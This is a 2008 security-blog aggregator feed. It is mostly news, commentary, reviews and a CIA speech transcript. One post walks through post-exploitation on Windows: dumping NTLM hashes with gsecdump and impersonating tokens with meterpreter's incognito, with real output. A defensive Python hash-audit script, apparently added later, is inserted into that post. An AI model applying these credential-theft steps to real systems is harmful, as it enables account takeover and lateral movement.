Sunday, September 14, 2008

Spliced feed for Security Bloggers Network

Bypassing ASP.NET “ValidateRequest” for Script Injection Attacks [Security Circus]

Posted: 14 Sep 2008 04:05 AM CDT

Travel: Off to VMworld 2008 in Vegas [Rational Survivability]

Posted: 13 Sep 2008 06:54 PM CDT

This coming week I'm off to VMworld in Las Vegas for a week of virtual immersion.

I'm looking forward to meeting with fellow practitioners, analysts, folks from VMware, Microsoft, Citrix and vendors as well as attending many of the sessions and labs.

There are several meet-ups including community get-togethers, so if you're in town, ping me and let's get together and exchange ideas.

There's a bunch of anticipated high-profile announcements and I hope some of them pan out.  I'll be live-blogging/tweeting (beaker) as much as possible from the show.

See you there.

/Hoff

Losing our History [Security For All]

Posted: 13 Sep 2008 04:01 PM CDT

My wife and I spent the Independence Day weekend this year in Washington DC. In addition to watching the fireworks from the base of the Iwo Jima memorial we visited a number of other memorials and museums. But probably the most amazing place we visited was the National Archives. Aside from the U.S. Constitution and Declaration of Independence, the National Archives is in fact an archive of the U.S. government’s correspondence, business and legal transactions, some of which are on exhibit. These exhibits include excerpts from the infamous Nixon Watergate tapes to (my personal favorite) a letter from a 10-year-old Fidel Castro to President Franklin D. Roosevelt dated November 6, 1940, asking for a “ten dollar bill green American” (maybe Roosevelt should have sent him the 10 bucks - you never know). The fact is that the National Archives is a repository of everything the U.S. Government is involved in. Everything. The good, the bad, the ugly. The greatest achievements, the finest moments and the things we would like to forget. Especially the things we’d like to forget. This is everything from the most visible, substantial and important documents like the U.S. Constitution to mundane interoffice correspondence, which can in the long run be just as important historically.

You might think that the digital age has made the job of the National Archives quite a bit easier. Unfortunately, nothing could be further from the truth, as this article from the New York Times points out.

Countless federal records are being lost to posterity because federal employees, grappling with a staggering growth in electronic records, do not regularly preserve the documents they create on government computers, send by e-mail and post on the Web. Federal agencies have rushed to embrace the Internet and new information technology, but their record-keeping efforts lag far behind.

Moreover, federal investigators have found widespread violations of federal record-keeping requirements. Many federal officials admit to a haphazard approach to preserving e-mail and other electronic records of their work. Indeed, many say they are unsure what materials they are supposed to preserve.

This confusion is causing alarm among historians, archivists, librarians, Congressional investigators and watchdog groups that want to trace the decision-making process and hold federal officials accountable. With the imminent change in administrations, the concern about lost records has become more acute.

While those conspiracy theory fans among us (okay, I admit it - but the truth is out there) prefer a more tantalizing threat like a shadowy cabal that secretly removes and suppresses information embarrassing or threatening to their members, the reality is much more mundane - and insidious. And it’s a whole lot harder to address.

"The Achilles' heel of record-keeping is people," said Jason R. Baron, the director of litigation at the National Archives. "We used to have secretaries. Now each of us with a desktop computer is his or her own record-keeper. That creates some very difficult problems."

That’s right - it’s those pesky end users. You know, those regular folks who are just trying to get their job done as efficiently as possible. Yeah, those people who we never have the time or budget to provide with decent hardware and software. And forget about education (no money for that in this year’s budget). Oh, and the folks who actually control the purse strings don’t have “keep a public record of the stupid things we do” at the top of their must-fund list. (Yes! I knew I could slide a conspiracy theory in there).

All this is really patriotic, and sufficiently alarmist to get some good hits on Google, but what does it have to do with security, Mr. Security For All?

Actually - everything. Remember the CIA triad: Confidentiality, Integrity and Availability. This issue is fundamental to both Integrity and Availability. From Wikipedia:

  • Integrity - In information security, integrity means that data cannot be modified without authorization. Integrity is violated when an employee (accidentally or with malicious intent) deletes important data files.
  • Availability - For any information system to serve its purpose, the information must be available when it is needed. This means that the computing systems used to store and process the information, the security controls used to protect it, and the communication channels used to access it must be functioning correctly.

I think we can all agree that not saving important information through neglect is the same thing as deleting important data. And when future generations - or a researcher today - can’t get access to an email that is germane to their research because it was never saved, that violates availability.

So how do we go about mitigating this threat? There is already a program in progress to bring the National Archives more fully into the 21st century, but it is not without its all-too-typical problems.

The National Archives is in the early stages of creating a permanent electronic record-keeping system, seeking help from the San Diego Supercomputer Center at the University of California, and from some of the nation's best computer scientists.

The electronic archive is behind schedule and over budget. But officials say they hope that the project, being developed with Lockheed Martin, will be able to take in huge quantities of White House records when President Bush leaves office in January.

As a point of reference 32 million White House e-mail messages were preserved as records of the Clinton administration. The National Archives expects to receive hundreds of millions from the Bush White House. And since disputes over White House records have occurred at the end of the last three administrations, we can count on more litigation in January.

So here’s a bold idea: why not take the money that will be flushed down the litigation rat hole and put it towards the electronic record-keeping system? Oh, but wait, that would mean that politicians would have to be subject to the same laws, standards and directives that all government employees are. Or maybe Lockheed Martin could get some help from the IBM Almaden research guys on storing, indexing and accessing insane amounts of information since the Webfountain project went dark. Or underground. (Yes! another conspiracy theory reference).

In any case this is a risk that must be managed - and soon - before we lose what amounts to our civic cultural heritage.

SFO Network Administrator Debacle Still Evident [Infosecurity.US]

Posted: 13 Sep 2008 01:53 PM CDT

NetworkWorld’s Robert McMillan reports that issues revolving around, and arising from, the dispute between the City of San Francisco and its former network administrator - Terry Childs - (now rogue, and incarcerated) are still evident.

Quite frankly, regardless of the vagaries (both tawdry, sundry, and soap opera like) of this case, the fact that the CCSFO Contractors and CCSFO DTIS admins are STILL SEARCHING for devices (after more than 60 Days) is outrageous and indicative of the talent being brought to bear on this issue. The citizens of one of the most technologically advanced (from the perspective of networking) cities in the United States deserve better.

[1] NetworkWorld: San Francisco Hunts For Mystery Device On City Network

[2] NetworkWorld: Rogue Network Administrator Hijack

Have an iPhone? All Use Captured In Screenshots. Automagically. [Infosecurity.US]

Posted: 13 Sep 2008 01:48 PM CDT

Wired’s GadgetLab blogger Brian X. Chen reports a new (and a potential windfall for forensic research) functionality of Apple’s (NasdaqGS: AAPL) iPhone smartphone.

Evidently, during a blogcast, forensics specialist Jonathan Zdziarski divulged the capability of the device to cache a copy of the latest screen activity. Apparently, this functionality is intended for the purpose of supporting the aesthetics of the product.

From the post: “…This is purely for aesthetic purposes: When an iPhone user taps the Home button, the window of the application you have open shrinks and disappears. In order to create that shrinking effect, the iPhone snaps a screenshot, Zdziarski said…”

Criminals Attack Large Hadron Collider Website [Infosecurity.US]

Posted: 13 Sep 2008 01:38 PM CDT

The Telegraph UK’s Roger Highfield [Science Editor] reports criminal hackers, apparently based in Greece, have defaced the Large Hadron Collider website in Switzerland. Scientists at CERN also speculated on the possibility of the hack attempts leading to a shutdown of the facility.

From The Telegraph: “Now it has emerged that, as the first particles were circulating in the machine near Geneva, a Greek group had hacked into the facility and displayed a page with the headline ‘GST: Greek Security Team.’

The people responsible signed off: ‘We are 2600 - dont mess with us. (sic)’

The website - cmsmon.cern.ch - can no longer be accessed by the public as a result of the attack…

If they had hacked into a second computer network, they could have turned off parts of the vast detector and, said the insider, ‘it is hard enough to make these things work if no one is messing with it.’”

12th IACR International Workshop on Practice and Theory in Public Key Cryptography [Infosecurity.US]

Posted: 13 Sep 2008 12:44 PM CDT

The IACR has issued a call for papers for the 12th IACR International Workshop on Practice & Theory in Public Key Cryptography 2009.

(Note: Infosecurity.US is a member of the IACR).

The full Call for Papers Notification appears after the jump.

12th IACR International Workshop on Practice and
Theory in Public Key Cryptography (PKC) 2009

March 18-20, 2009, Irvine, CA, USA

DEADLINES:
----------
Submission:     Sept. 24, 11:59pm PST, 2008
Notification:   Nov. 25, 2008
Camera-Ready:   Dec. 20, 2008

GENERAL INFORMATION:
--------------------
Original research papers on all technical aspects of public
key cryptography are solicited for submission to PKC 2009, the
12th International Workshop on Practice and Theory in Public
Key Cryptography.

SUBMISSION INSTRUCTIONS:
------------------------
Submissions must not substantially duplicate work that any
author has published in a journal or a conference/workshop
with proceedings, or has submitted (or is planning to submit) before
the author notification deadline to other conferences/workshops
that have proceedings. Parallel submissions will be immediately
rejected and the names of the authors involved will be shared
with other conferences in the field.

Each submission must be:

* At most 14 pages, not including references and appendices,
in 11pt font and with reasonable margins.

* Intelligible and self-contained without appendices
(reviewers are not required to read them).

* Anonymous: no author names, affiliations, acknowledgments,
or obvious references.

Submissions not meeting these criteria will be rejected.

If a submission is accepted, one of the authors is expected to
present the paper at the workshop.  Further submission instructions
will be posted on the conference home page:
http://www.iacr.org/workshops/pkc2009

PROCEEDINGS:
------------
PKC’09 proceedings will be published in the Springer-Verlag LNCS Series
and will be available at the conference.

ORGANIZATION:
-------------
Conference Co-Chairs:   Stanislaw Jarecki and Gene Tsudik, UC Irvine, USA
Contact email:          pkc09 [AT] ics.uci.edu

US-CERT: Reports of DHS Email Spam [Infosecurity.US]

Posted: 13 Sep 2008 12:43 PM CDT

US-CERT has released a notification specifying a new spam attack using Department of Homeland Security addresses.

From the announcement: “…spam email messages are being sent that appear to come from high-level DHS officials, some of which attempt to entice the user into an advance fee fraud scam. In some cases, the sender’s address has been spoofed so that the email appears to come from a legitimate dhs.gov address….”

Playing with Live Streams for SRT [Network Security Blog]

Posted: 13 Sep 2008 08:07 AM CDT

This morning Michael Santarcangelo and I will be playing with streaming the audio from a Security Roundtable podcast.  We don’t really have a topic or a theme for the podcast.  We don’t even have any stories to talk about.  We’ll just be sitting online, talking and testing out how to use the streaming software.  And let me tell you, this software has more options and tricks than I’ll use in a long, long time.

The stream will start at 7:00 am PDT at http://hak5radio.com:8000/SRT.mp3.m3u  I think.  I may have the URL munged up a little, so if that doesn’t work, try it with just the .mp3 extension. We have a guest lined up thanks to a tweet last night, but this really is just going to be 3 security guys talking about whatever interests them for about 45 minutes. 

If this works out, Rich and I may try streaming the Network Security Podcast when we record.  We can’t do anything as organized as actually have a set time and date for our recording sessions, but this will be one step closer to being able to do so. 

PS.  I created a channel for today’s session on IRC.freenode.net.  Predictably, the channel name is ##SRT. 


Hackers attack Large Hadron Collider [Security Circus]

Posted: 13 Sep 2008 08:00 AM CDT

United 'bankruptcy' points to new stock scam techniques [Security Circus]

Posted: 13 Sep 2008 07:57 AM CDT

Large Hadron Collider - LHC Livecam [Security Circus]

Posted: 13 Sep 2008 07:50 AM CDT

"Apple views tennis-shoe DRM as a way to head off what it sees as a potential ..." [Security Circus]

Posted: 13 Sep 2008 07:24 AM CDT

Apple views tennis-shoe DRM as a way to head off what it sees as a potential plague of sneaker hacking. "Some people," the patent application observes, "have taken it upon themselves to remove the sensor from the special pocket of the [iPod-linked] Nike+ shoe and place it at inappropriate locations (shoelaces, for example) or place it on non-Nike+ model shoes." Oh my God: Geeks are ripping the sensors out of their sneakers and sticking them on their shoelaces! Unleash the shoe nazis! It used to be cool to be an Apple fanboy. Now it's starting to be embarrassing. –Apple declares war on sneaker hackers

International Data Privacy Laws by Country [Security Circus]

Posted: 13 Sep 2008 04:26 AM CDT

UCSB Security Group's Attack on Voting Machines (Part 2 of 2) [Security Circus]

Posted: 13 Sep 2008 04:24 AM CDT

UCSB Security Group's Attack on Voting Machines (Part 1 of 2) [Security Circus]

Posted: 13 Sep 2008 04:24 AM CDT

(Image) [Security Circus]

Posted: 13 Sep 2008 04:13 AM CDT

via ThreatExpert [Security Circus]

Posted: 13 Sep 2008 04:08 AM CDT

Reposted from codec via sid77

"Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlus..." [Security Circus]

Posted: 13 Sep 2008 04:02 AM CDT

Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlusconi, risks being jailed for up to five years. The prosecutors recommended to the justice ministry that she be indicted because of a speech she made to a leftwing rally in July. Referring to the attitude to gay people of the Catholic church and Pope Benedict - the former cardinal Joseph Ratzinger - Guzzanti said: "In 20 years Ratzinger will be dead and will end up in hell, tormented by queer demons - not passive ones, but very active ones." –Comedian who satirised Pope could face prosecution | World news | The Guardian
Reposted from sid77

(Image) [Security Circus]

Posted: 13 Sep 2008 04:00 AM CDT

(Image) [Security Circus]

Posted: 13 Sep 2008 04:00 AM CDT

(Image) [Security Circus]

Posted: 13 Sep 2008 03:58 AM CDT

passing the hash with gsecdump and msvctl (yes more) [Carnal0wnage Blog]

Posted: 12 Sep 2008 08:59 PM CDT

So just a follow-up post on gsecdump and msvctl after doing prep for post-exploitation topics for the toorcon workshop.

For some reason I thought that gsecdump would not require admin privileges; this is incorrect, it will require admin or SYSTEM on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).

"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."

OK, so you still need admin or higher, but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to that is active logon sessions. So if you are in userland as admin or higher, you might be stuck with that user's hash, because once they log out the active logon session hash seems to disappear (sometimes ??), but if you get a SYSTEM shell you might get some of the previously logged-in users.

example:
#popped a system shell and got a command shell with meterpreter

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged into the box as nobody

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But once you have a hash, any user can use that hash, whereas you have to be admin/SYSTEM to pass tokens.
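The dump above is in pwdump format (ACCOUNT:RID:LMHASH:NTHASH:::), and that format is exactly what a defender would feed to a credential-hygiene check after a dump like this turns up during an assessment. The following is an added example written for this page, not code from the post or from gsecdump: it parses the three runs above (embedded as constructed sample text, prompts and echoed commands included) and flags two things a hardening review cares about: accounts for which a real LM hash is still stored (the weak legacy hash that the NoLMHash policy is meant to eliminate) and accounts whose NT hash equals the well-known NT hash of an empty password. The finding names, the function names and the DumpEntry type are this example's own.

```python
"""Credential-hygiene audit over pwdump-format lines (the format gsecdump -u prints).
Sample input below reproduces the gsecdump runs shown in the post; the finding
names and helper names are this example's own, not gsecdump's."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Well-known constants: the LM hash and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the three gsecdump -u runs from the post, as they appeared.
SAMPLE_DUMP = r"""
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

HEX32 = re.compile(r"^[0-9a-f]{32}$")


@dataclass(frozen=True)
class DumpEntry:
    account: str          # DOMAIN\user or DOMAIN\machine$
    rid: Optional[int]    # gsecdump leaves this field blank
    lm_hash: str
    nt_hash: str


def parse_pwdump_line(line: str) -> Optional[DumpEntry]:
    """Return a DumpEntry for a pwdump-format line, or None for anything else
    (shell prompts, the echoed command, blank lines)."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    account, rid_field = parts[0], parts[1]
    lm, nt = parts[2].lower(), parts[3].lower()
    if not account or not HEX32.match(lm) or not HEX32.match(nt):
        return None
    rid = int(rid_field) if rid_field.isdigit() else None
    return DumpEntry(account, rid, lm, nt)


def parse_dump(text: str) -> List[DumpEntry]:
    """Parse every pwdump-format line in a captured gsecdump session."""
    return [e for e in (parse_pwdump_line(l) for l in text.splitlines()) if e is not None]


def audit_entry(e: DumpEntry) -> List[str]:
    """Classify one entry. An LM hash other than the empty-password constant means
    the legacy LM hash is still being stored for this account, i.e. NoLMHash (or a
    15+ character password) is not in effect; an NT hash equal to EMPTY_NT means
    the stored credential is that of an empty password."""
    findings = []
    if e.account.endswith("$"):
        findings.append("machine-account")
    if e.nt_hash == EMPTY_NT:
        findings.append("blank-password")
    if e.lm_hash != EMPTY_LM:
        findings.append("lm-hash-stored")
    return findings


def audit_dump(text: str) -> Dict[str, List[str]]:
    """Collapse repeated runs to one entry per account and report findings."""
    report: Dict[str, List[str]] = {}
    for e in parse_dump(text):
        report.setdefault(e.account, audit_entry(e))
    return report


if __name__ == "__main__":
    for account, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{account}: {', '.join(findings) or 'ok'}")
```

Run against the sample, the machine account is reported as a machine account with the empty-password NT hash, and XPSP1VM\nobody is flagged because a real LM hash is stored alongside its NT hash; on a real dump the lm-hash-stored finding is the one to chase, since it points at hosts where the NoLMHash policy has not taken effect.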

Let's see the same scenario with incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#login as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#log out as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody

meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed, because it pops up a whole new command shell, which is kind of a bummer with a remote shell. You'll have to use the pass the hash toolkit instead.

Some other reading on gsecdump and msvctl:
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml

http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.

http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:

"Hash injection mitigation? - Steve Riley [MSFT], 06-Oct-07: In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are far more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...

Book Review: Understanding UNIX/Linux Programming [Reflections on Security]

Posted: 12 Sep 2008 07:59 PM CDT

I've posted a review of Understanding UNIX/LINUX Programming: A Guide to Theory and Practice by Bruce Molay on Amazon. While not a security topic per se, a solid grounding in systems programming is a prerequisite for vulnerability researchers and other technically oriented security professionals. Arguably, there is no better introduction to the subject than this book.

Book Review: Against The Gods - The Remarkable Story Of Risk [Reflections on Security]

Posted: 12 Sep 2008 07:42 PM CDT

To many practitioners, information security is a form of risk management. Since it is impossible to protect a complex system against all conceivable security threats, an approach based on the assessment of risk is employed to distinguish between the threats that are worth worrying about and those that aren't. But what exactly does the concept of risk represent? How does one measure (never mind control) risk? This is an age-old problem mankind has been struggling with for centuries.

Against the Gods: The Remarkable Story of Risk is a historical overview of the advances made in the struggle to measure and control uncertainty. While the author's viewpoint is primarily from the perspective of risk to investments made on the stock market, the lessons learned are of value to security professionals as well. Contrasted with the sophisticated methods employed by financial institutions controlling their exposure to the unpredictable ups and downs of the global economy, the risk management methods currently available to security managers seem crude and laughable in comparison. If we are to make any headway in the battle against identity theft, data breaches, malware, and all the other information security woes that currently plague us, we need better risk management tools, so that our limited security budgets can be spent more effectively.

DNI Open Source Conference 2008 - Remarks From CIA Director [Infosecurity.US]

Posted: 12 Sep 2008 05:55 PM CDT

The Office of the Director of National Intelligence (ODNI) has released the following transcript, detailing the remarks and question & answer session during Day 2 (yesterday, September 12th, 2008) of the ODNI Open Source Conference in Washington, D.C.

Without further ado, we are publishing this fascinating transcript after the break.

Remarks and Q&A by the Director of the Central Intelligence Agency
Michael V. Hayden
DNI Open Source Conference 2008
Washington, DC
September 12, 2008

MR. DOUG NAQUIN (Director, Open Source Center):  Good morning, again.

To recall yesterday afternoon's community panel session, I noted that as we developed our capabilities over the past few years, both in the Open Source Center and in the community writ large, we needed to secure a voice at the proverbial table or tables so we could begin to have those conversations that would institutionalize open source as a recognized program as well as, as a discipline.

One person who has been instrumental in getting open source a voice at those tables is our next speaker:  first, as Principal Deputy Director of National Intelligence under our first DNI, John Negroponte; and now as Director of the Central Intelligence Agency.

Michael V. Hayden has ensured the Intelligence Community does not lose sight of an environment that we've seen over these two days is growing and morphing continuously in terms of its potential to improve our knowledge of and insight into the world in which we operate.  As much as anyone, Director Hayden has taken the community from acknowledging open source is good to actionable footing.

As a former military attaché in J-2, he is deeply familiar with the value of open source on the ground, and as a former Director of the National Security Agency, he is certainly no stranger to the challenge of volume.

So without further ado, it is my distinct pleasure to introduce Mr. Michael V. Hayden, Director of the Central Intelligence Agency.

(Applause.)

DIRECTOR MICHAEL V. HAYDEN (Director, CIA):  Well, thanks, Doug.  Good morning, everyone.  It's a pleasure to be here.  You get 39 years of being only to wear a blue tie, and you see what happens, huh?  (Laughter.)

As Doug suggested, I'm no stranger to the open source discipline and actually quite a fan of it.  As you mentioned, I'm a career intelligence officer, so I'd like to start today with maybe an observation that could surprise some of you.  Secret information isn't always the brass ring in our profession.  In fact, there's real satisfaction in solving a problem or answering a tough question with information that someone was dumb enough to leave out in the open.  (Chuckles.)

Doug mentioned I was an attaché in Bulgaria – a long time ago, about 20 years now.  Part of that job is immersing yourself in that society.  Someone once gave me – the description of a good attaché is someone who has become so immersed in the society that when he wakes up in the morning, he can sense that something is different today.  So in order to be able to do that, in order to immerse yourself, you read the press even if it's the state-run press, you watch television even if it's state-run news shows.  You make all kinds of official contacts that you can possibly make.  Most of that stuff is a little dry, but in essence it gave me a sense for norm; you know, it gave you a sense as to what the center line was.

Now there was a lot of information there, always freely available, and I collected it in open and sometimes not-so-open ways.  But the key was to actually know what to look for and then be in a position to absorb it.

One of the things I did as an attaché – and I realize this is a little bit different than maybe the narrowly defined definition of open source, but I think it has powerful echoes, so I want to share it with you.  As an attaché, you are an overt collector.  And this was a communist country, a closed state in which attaches were fairly closely watched.  But again, you wanted to immerse yourself in that society to learn as much about it as you possibly could.

So one of the things I took to doing is, rather than driving on collection trips in the U.S. government Volvo that we had, I took to taking trains.  And so I would get up early in the morning, try to slip out of the house without being observed.  I'd take the streetcar down to the train station, buy the ticket that day, get on the train, and then travel across Bulgaria from Sofia to the Black Sea, and then turn around and come back.

Now, that was an attractive route for me because one of the more important things I had to observe was Bulgaria's armored brigades, of which there were five.  And many of you probably know tanks are heavy, and they like to move them by rail.  So guess where all five tank brigades were.  They were all along the main east-west rail lines.

So I would go into the car and immediately go to the dining car and figure out some way that I could stay there beyond the 45-minute limit that was posted at both ends of the car; not because the Bulgarian breakfast food was particularly attractive – (laughter) – but because the dining car had windows on both sides, and that I could observe both sides as we traveled out.

So we get to Varna or Burgas – okay – and my goal there was to be – if I could possibly be invisible, I would have been, but I can't, so I just try to keep my mouth shut, speak as little Bulgarian as I could – ordering things and so on – and, again, trying to be as inconspicuous as possible.

But on the return trip, I change the M.O.  On the return trip, I'd done all my observation.  On the return trip, I wanted to – back to that verb I used earlier – absorb, but this time I was going to absorb not visually, but socially, and so I would walk the length of the car – multiple cars – looking for that couchette that had the empty seat with seemingly interesting people in all of the other seats.

I can recall one instance where I was walking by a couchette with six seats – five full, one empty.  The five individuals in the seats were Bulgarian air force academy cadets – (laughter) – and I just looked at the seat and said – (in Bulgarian) – is it free?  Da.  Got away with that without too much of an accent, sat down, pulled my hat down over my eyes, closed my eyes and just sat there.

They were practicing their aviation English.  Now the international language of aviation is English, and so if you want to be an aviator, you've got to – you know, you've got to have some working knowledge of English.  And so they would be saying some things in Bulgarian and coming back in English or saying some things in English and coming back in Bulgarian.  And one of the phrases – one of the phrases they put out was "runway."  And there was a long pause because whoever they were asking this of didn't know the answer.  So from the – beneath the brim of my hat, this voice – mine – simply said, pista (ph) – (chuckles) – which is the Bulgarian word for runway or racetrack and so on.

And it was one of those Rod Serling kind of moments for those poor cadets.  (Laughter.)  I identified who I was, so as not to make them vulnerable or at least not to do something they weren't prepared to – well, only volunteered to do, talk to an American.  One of them vaporized in an instant.  He was gone from the car and I never saw him again.  (Laughter.)  But the other four stayed there and we spent the rest of the time going into Sofia just talking about life and death and military service and how's the academy and what's your curriculum and what do you intend to fly and how long – how many flight hours do you get?  (Laughter.)  What's the saddle depth of an SS-21?  (Laughter.)

I was doing, back in the mid 1980s, socially, absorbing information that wasn't, in any real sense, protected, information that was available, would we but get ourselves up against it and be able to, again, use that verb, absorb it.  In today's world, that information that would have been available 20, 22 years ago, only by this social discourse, is now available in what we call open source, out there in the electronic media in which our species has decided to put almost all known knowledge.  And so that experience as an attaché has given me an appreciation of that which we can learn, information readily available, unguarded, not classified, if we would but get ourselves in a position to access it.

I should also add too that those five armor brigades that I wanted to look at from Kniajevo and Sliven and Yambol and Kazalak, okay, they were actually pretty big.  They were actually pretty easy to see.  Today, the job we have in the Intelligence Community is a lot harder and a bit different.  The things we want to discover are not out there as the size of an armor brigade.  Collection, analysis, dissemination of information is as important as it has ever been.  And so your conference here, covering such a broad array of topics including – and I'm happy to see virtually every stakeholder in the open source enterprise here – makes abundantly clear that the rich potential, far reach, and real impact of open source intelligence has finally been embraced.

Now, it's something I appreciated even before that tour in Bulgaria and I've tried to carry it forth ever since.  A little over three years ago, as Doug suggested, a small group of us sat down to figure out what the new Intelligence Community might look at under the newly created Director of National Intelligence John Negroponte.  John was at the DNI and I was his deputy.  We set up a shop just a few blocks from here in the Old Executive Office Building and literally taped blank sheets of butcher paper all along the wall of the temporary office we had been given.  And I mean – you know, we used the pages, blank as a metaphor.  This was not a metaphor – (chuckles) – okay?  The pages were blank.  And how did we want to structure this community?

There's a lot to think through.  But it didn't take us long to identify the way ahead for open source.  In fact, we saw the establishment of this center, the Open Source Center, as one of the three most important objectives for the ODNI in its first year.  The other two?  The National Clandestine Service at CIA, second, the National Security Branch at FBI, and, third, a more autonomous Open Source Center for the Intelligence Community.  We considered a couple of options for creating this center.  But at the end of the day, we decided that voting on the expertise and the capacities of the Foreign Broadcast Information Service and placing the center in CIA made the most sense.  FBIS represented the strongest foundation on which we could build, with capabilities that were already out there, ranging from media and Internet collection to research and analysis to advanced I.T., database acquisition and training.  And keeping it in CIA allowed the Open Source Center to focus on mission while CIA handled most of the housekeeping chores that would come about from any such organization.

So the aim from the start has been to build and strengthen those capabilities that already existed and then extend their reach.  And as I said, we made the Director of CIA the executive agent for open source.  I'd be responsible for the center's success, not just in such traditional roles as collector and analyzer and disseminator, but in a new, broader role of community leader working to expand the open source discipline.  Let me make sure we understand that distinction.  The Open Source Center was designed to be a production line in terms of the creation of knowledge of use to American policy-makers.  But it was also designed to be an advocate, a spokesman, a facilitator for the open source enterprise for the open source discipline beyond the fence line, beyond the confines of the Open Source Center itself.

I don't offer this bit of history as some sort of a lesson in the IC wiring diagram.  I want you simply to recognize that open source intelligence is widely seen as both an essential capability and a formal asset in our national security infrastructure.  As the DNI's strategic plan puts it, and I'm quoting here now, "No aspect of collection requires greater consideration or holds more promise than open source."  Here's why.  Those working in this discipline are at the nexus, right now, of two intensely powerful dynamic forces: the media and information technology.

And while the Internet has revolutionized human interaction, there is still an awful lot for us to learn about it and the opportunity that it now represents.  Finally, the questions our customers ask, whether it's a policy-maker or military commander or law-enforcement official demand answers, many of which are only available through open source research.

So when I became Director of CIA, one of the first things I did was to make Doug a direct report to me.  So Doug, in the org chart, is up there with the DI and the head of the National Clandestine Service, the Director of Support, and the Director of Science and Technology.  And early in my tenure I think Steve Kappes and I – Steve is the Deputy – had gone a bit public with the number of installations, the number of partners we visited.  Steve and I have been to more than 50 liaison partners in about a two-year time period.

In addition to that, we made a special effort to visit the outposts in the open source enterprise as well, and I think I've got four of those already in terms of notches on my belt.  One stop that meant a great deal to me was designed to be a courtesy call.  I was in Key West, not on business.  (Chuckles.)  And there is an open source facility there that looks at that island about 90 miles just off the southern marker buoy there.

It was going to be a 20-minute courtesy call.  I was there for three hours because, talk about time on target, the people in this little cinderblock shack on the extreme southern reaches of Key West knew so much about what was happening in Cuba.  And for me as the Director of CIA to sit with them and watch Cuban soap operas and have them tell me what they were extracting from watching these soap operas was quite remarkable.

They gave me a videotape, DVD, of a program that they had captured from the Internet.  And it had a Cuban soap-opera star starring in it, and there are only two other players.  And his name is Nicanor (sp) and he's making a fine brew of coffee and there's a knock at his door.  And it's two individuals from the security service to install the microphones.  (Laughter.)

We're here to install the microphones.  He says, what do you mean, microphones?  And it goes for about 17 minutes of some of the most subtle satiric commentary on a totalitarian state I have ever seen.  He mentions that – they have to decide where to put the microphones and they can't put them in the kitchen because it's too noisy and the bedroom air conditioner interferes with it.  So, finally, they say, we have to put the microphones in the bathroom.  (Laughter.)

